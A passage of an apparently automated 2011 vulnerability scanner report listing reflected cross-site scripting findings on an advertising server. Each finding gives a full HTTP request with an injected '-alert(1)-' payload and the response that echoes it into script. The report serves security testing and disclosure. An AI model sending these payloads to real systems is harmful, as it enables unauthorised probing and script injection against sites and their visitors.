The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f995'-alert(1)-'d38328d152e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_bus7f995'-alert(1)-'d38328d152e;sz=160x600;ord=1807584008? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:34 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:34 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_bus7f995'-alert(1)-'d38328d152e;sz=160x600;net=q1;ord=1807584008;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/q1.q.boston/be_bus [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff159'-alert(1)-'0f3a998551e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_bus;sz=160x600;ord=1807584008?ff159'-alert(1)-'0f3a998551e HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008?ff159'-alert(1)-'0f3a998551e;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7520a'-alert(1)-'51a5e5793c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston7520a'-alert(1)-'51a5e5793c6/be_home;sz=728x90;ord=84105094? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:38 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:38 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston7520a'-alert(1)-'51a5e5793c6/be_home;sz=728x90;net=q1;ord=84105094;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.8. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5e2d'-alert(1)-'6cb15244eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_homef5e2d'-alert(1)-'6cb15244eb;sz=728x90;ord=84105094? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:39 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:39 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_homef5e2d'-alert(1)-'6cb15244eb;sz=728x90;net=q1;ord=84105094;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/q1.q.boston/be_home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39bd4'-alert(1)-'4b3749168e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_home;sz=728x90;ord=84105094?&39bd4'-alert(1)-'4b3749168e0=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:37 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:37 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094?&39bd4'-alert(1)-'4b3749168e0=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/q1.q.boston/be_home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d6f'-alert(1)-'720b847c210 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_home;sz=728x90;ord=84105094?67d6f'-alert(1)-'720b847c210 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Tue, 19 Jul 2011 20:42:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:42:35 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094?67d6f'-alert(1)-'720b847c210;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.11. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9740'-alert(1)-'a5134f31e3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.bostonf9740'-alert(1)-'a5134f31e3a/bus;sz=728x90;ord=386907169? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Tue, 19 Jul 2011 20:44:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:05 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.bostonf9740'-alert(1)-'a5134f31e3a/bus;sz=728x90;net=q1;ord=386907169;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df57'-alert(1)-'4e26a563c98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/bus5df57'-alert(1)-'4e26a563c98;sz=728x90;ord=386907169? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Tue, 19 Jul 2011 20:44:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:05 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/bus5df57'-alert(1)-'4e26a563c98;sz=728x90;net=q1;ord=386907169;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/q1.q.boston/bus [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2803'-alert(1)-'241828aa501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/bus;sz=728x90;ord=386907169?&a2803'-alert(1)-'241828aa501=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Tue, 19 Jul 2011 20:44:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:04 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/bus;sz=728x90;net=q1;ord=386907169?&a2803'-alert(1)-'241828aa501=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/q1.q.boston/bus [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20986'-alert(1)-'b05d3a33d8b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/bus;sz=728x90;ord=386907169?20986'-alert(1)-'b05d3a33d8b HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Tue, 19 Jul 2011 20:44:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:02 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/bus;sz=728x90;net=q1;ord=386907169?20986'-alert(1)-'b05d3a33d8b;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbb0b'-alert(1)-'5e82e9a4066 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjdbb0b'-alert(1)-'5e82e9a4066/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:39 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10121511467_1311108279","http://ad.doubleclick.net/adjdbb0b'-alert(1)-'5e82e9a4066/q1.q.boston/be_bus;net=q1;u=,q1-10121511467_1311108279,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160",
...[SNIP]...

4.16. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f07c4'-alert(1)-'40a0d6bf13d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.bostonf07c4'-alert(1)-'40a0d6bf13d/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:40 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10223486171_1311108280","http://ad.doubleclick.net/adj/q1.q.bostonf07c4'-alert(1)-'40a0d6bf13d/be_bus;net=q1;u=,q1-10223486171_1311108280,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160","600",false)
...[SNIP]...

4.17. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57876'-alert(1)-'7b7238e5418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_bus57876'-alert(1)-'7b7238e5418;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
